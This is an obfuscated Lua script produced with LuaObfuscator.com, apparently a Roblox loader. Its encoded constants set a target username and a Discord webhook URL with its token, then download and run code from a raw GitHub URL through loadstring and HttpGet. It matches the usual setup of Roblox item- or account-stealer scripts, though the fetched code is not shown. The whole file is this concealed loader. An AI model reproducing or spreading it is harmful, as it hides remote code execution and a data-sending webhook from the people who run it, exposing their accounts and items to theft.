--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-((1 + 1) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=568 -(367 + 201) ;local v84;while true do if (v83==(927 -(214 + 713))) then v84=(879 -(282 + 595))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or 0 ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (1641 -(1523 + 114)) ;return (v37 * (15077001 + 1700215)) + (v36 * 65536) + (v35 * (364 -108)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(1 + 1)) then v43=nil;v44=nil;v38=3;end if (v38~=0) then else v39=0 -0 ;v40=nil;v38=1;end if (v38==(2 -1)) then v41=nil;v42=nil;v38=1 + 1 ;end if (v38==3) then v45=nil;while true do local v89=0 -0 ;while true do if (v89==0) then local v97=0 -0 ;while true do if (v97==(0 -0)) then if (v39==(1 + 1)) then for v124=2 -1 ,v24() do local v125=0;local v126;local v127;local v128;while true do if (v125~=1) then else v128=nil;while true do if (v126==0) then local v156=0 -0 ;while true do if (v156==1) then v126=1;break;end if (v156~=0) then else v127=0 + 0 ;v128=nil;v156=1 + 0 ;end end end if (v126~=1) then else while true do if (v127==0) then v128=v22();if (v21(v128,1056 -(87 + 968) ,4 -3 )==(0 + 0)) then local v161=0;local v162;local v163;local v164;local v165;while true do if (v161==(0 -0)) then v162=0;v163=nil;v161=1;end if (v161~=(1415 -(447 + 966))) then else while true do if (v162==1) then local v166=0 -0 ;while true do if (v166~=1) then else v162=1819 -(1703 + 114) ;break;end if (v166~=(701 -(376 + 325))) then else v165={v23(),v23(),nil,nil};if (v163==0) then local v174=0;local v175;while true do if (0==v174) then v175=0;while true do if (v175==0) then v165[3]=v23();v165[2 + 2 ]=v23();break;end end break;end end elseif (v163==(2 -1)) then v165[3]=v24();elseif (v163==(16 -(9 + 5))) then v165[379 -(85 + 291) ]=v24() -((1267 -(243 + 1022))^16) ;elseif (v163==3) then local v180=0;local v181;while true do if (v180==(0 -0)) then v181=0 + 0 ;while true do if ((1180 -(1123 + 57))==v181) then v165[3]=v24() -((2 + 0)^16) ;v165[258 -(163 + 91) ]=v23();break;end end break;end end end v166=1931 -(1869 + 61) ;end end end if (v162~=(1 + 1)) then else if (v21(v164,3 -2 ,1 -0 )~=1) then else v165[2]=v45[v165[1 + 1 ]];end if (v21(v164,2,2)~=(1 -0)) then else v165[3 + 0 ]=v45[v165[3]];end v162=1477 -(1329 + 145) ;end if (v162==(974 -(140 + 831))) then if (v21(v164,1853 -(1409 + 441) ,721 -(15 + 703) )~=(1 + 0)) then else v165[442 -(262 + 176) ]=v45[v165[4]];end v40[v124]=v165;break;end if (v162==0) then v163=v21(v128,1723 -(345 + 1376) ,3);v164=v21(v128,4,6);v162=1;end end break;end if (v161==1) then v164=nil;v165=nil;v161=690 -(198 + 490) ;end end end break;end end break;end end break;end if (v125==0) then v126=0 -0 ;v127=nil;v125=2 -1 ;end end end for v129=1,v24() do v41[v129-(1207 -(696 + 510)) ]=v29();end return v43;end if (v39==(1 -0)) then local v123=1262 -(1091 + 171) ;while true do if (v123==2) then v39=1 + 1 ;break;end if (v123==(0 -0)) then v44=v24();v45={};v123=3 -2 ;end if ((375 -(123 + 251))==v123) then for v148=1,v44 do local v149=0 -0 ;local v150;local v151;local v152;while true do if ((698 -(208 + 490))~=v149) then else local v157=0 + 0 ;while true do if (v157==(1 + 0)) then v149=837 -(660 + 176) ;break;end if (0==v157) then v150=0;v151=nil;v157=1 + 0 ;end end end if (1==v149) then v152=nil;while true do if (v150==(202 -(14 + 188))) then v151=v22();v152=nil;v150=1;end if (v150~=1) then else if (v151==(676 -(534 + 141))) then v152=v22()~=(0 + 0) ;elseif (v151==(2 + 0)) then v152=v25();elseif (v151~=(3 + 0)) then else v152=v26();end v45[v148]=v152;break;end end break;end end end v43[3]=v22();v123=3 -1 ;end end end v97=1 -0 ;end if (v97~=(2 -1)) then else v89=1;break;end end end if ((1 + 0)==v89) then if (v39~=0) then else local v98=0 + 0 ;local v99;while true do if (v98~=(396 -(115 + 281))) then else v99=0 -0 ;while true do if ((2 + 0)==v99) then v39=1;break;end if (v99==1) then local v146=0;while true do if (v146~=0) then else v42={};v43={v40,v41,nil,v42};v146=868 -(550 + 317) ;end if (v146~=1) then else v99=2;break;end end end if (v99==(0 -0)) then local v147=0;while true do if (v147==(1 -0)) then v99=1;break;end if (v147==(0 -0)) then v40={};v41={};v147=286 -(134 + 151) ;end end end end break;end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1666 -(970 + 695) ;local v49=(v21(v47,1 + 0 ,38 -18 ) * (((2282 -(60 + 230)) -(582 + 1408))^(110 -78))) + v46 ;local v50=v21(v47,26 -5 ,116 -85 );local v51=((v21(v47,1856 -(1195 + 629) )==(1 + 0)) and  -(1 -0)) or (242 -(187 + 54)) ;if (v50==(780 -(162 + 618))) then if (v49==(0 + 0)) then return v51 * (0 + 0) ;else v50=561 -(306 + (826 -(426 + 146))) ;v48=0 + 0 ;end elseif (v50==(1364 + 683)) then return ((v49==(1467 -(108 + 791 + 568))) and (v51 * ((1 -0)/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-((1536 -(282 + 1174)) + 943) ) * (v48 + (v49/(((815 -(569 + 242)) -2)^(1688 -(1373 + 263))))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(0 -0)) then return "";end end v53=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;local v54={};for v66=1025 -(706 + 318) , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=1251 -(721 + 530) ;local v56;while true do if (v55==(1272 -(945 + 326))) then return v56;end if (v55==(0 -0)) then v56=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v55=701 -(249 + 22 + 429) ;end end end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (1502 -(1408 + 92)) );v19=v19 + 2 ;return (v58 * (1342 -(461 + 625))) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v59,1,1));return "";end end else local v86=v2(v0(v59,16));if v20 then local v90=v5(v86,v20);v20=nil;return v90;else return v86;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end if (v88==1) then if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=2) then local v103;local v104;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v104=v80[2];v103=v78[v80[3]];v78[v104 + 1 ]=v103;v78[v104]=v103[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];elseif (v81==3) then v78[v80[2]]=v62[v80[3]];else local v133=0;local v134;local v135;local v136;local v137;while true do if (0==v133) then v134=v80[2];v135,v136=v71(v78[v134](v13(v78,v134 + 1 ,v80[3])));v133=1;end if (2==v133) then for v154=v134,v73 do local v155=0;while true do if (v155==0) then v137=v137 + 1 ;v78[v154]=v135[v137];break;end end end break;end if (v133==1) then v73=(v136 + v134) -1 ;v137=0;v133=2;end end end elseif (v81<=6) then if (v81==5) then v78[v80[2]]=v80[3];else local v118=0;local v119;while true do if (v118==0) then v119=v80[2];v78[v119]=v78[v119](v13(v78,v119 + 1 ,v73));break;end end end elseif (v81<=7) then local v120=0;local v121;local v122;while true do if (v120==1) then v78[v121 + 1 ]=v122;v78[v121]=v122[v80[4]];break;end if (v120==0) then v121=v80[2];v122=v78[v80[3]];v120=1;end end elseif (v81>8) then v78[v80[2]]();else do return;end end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503083O0052454D424F4C4E4903093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130393536323634323930372O30353O302F77306F796D464E6E654A5667454E2O65687852486E67626C6576636932654C4A50652D6F4A65675870726D3157496C522D743751663134456B7A5576555A693132724E58030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012023O00013O00304O0002000300124O00013O00304O0004000300124O00013O00304O0005000600124O00073O00122O000100083O00202O00010001000900122O0003000A6O000400014O0004000100044O00065O00022O00093O000100012O00083O00017O00",v9(),...);end
